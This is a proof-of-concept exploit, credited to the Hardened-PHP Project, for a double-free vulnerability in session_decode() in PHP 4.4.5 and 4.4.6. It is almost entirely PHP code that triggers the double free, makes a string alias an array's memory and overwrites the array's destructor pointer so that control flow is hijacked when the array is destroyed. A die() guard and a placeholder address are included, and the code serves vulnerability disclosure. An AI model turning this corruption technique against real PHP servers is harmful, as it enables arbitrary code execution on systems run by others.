PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

<?php
////////////////////////////////////////////////////////////////////////
//                                                                    //
//         Proof of concept code from the Hardened-PHP Project        //
//                   (C) Copyright 2007 Stefan Esser                  //
//                                                                    //
////////////////////////////////////////////////////////////////////////
//     PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability     //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

ini_set("session.serialize_handler", "php");
session_start();

$varname = str_repeat("D", 39);
$$varname = &$_SESSION;

// Trigger the double free
session_decode($varname.'|i:0;');

$_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
$_________________a = array("OneElement");

// Now x and a point to the same memory. Therefore x can be used to modify a

// Overwrite pointer to the destructor
$_________________x[8*4+0] = chr(0x55);
$_________________x[8*4+1] = chr(0x66);
$_________________x[8*4+2] = chr(0x77);
$_________________x[8*4+3] = chr(0x88);

// Trigger the destruction
unset($_________________a);
?>
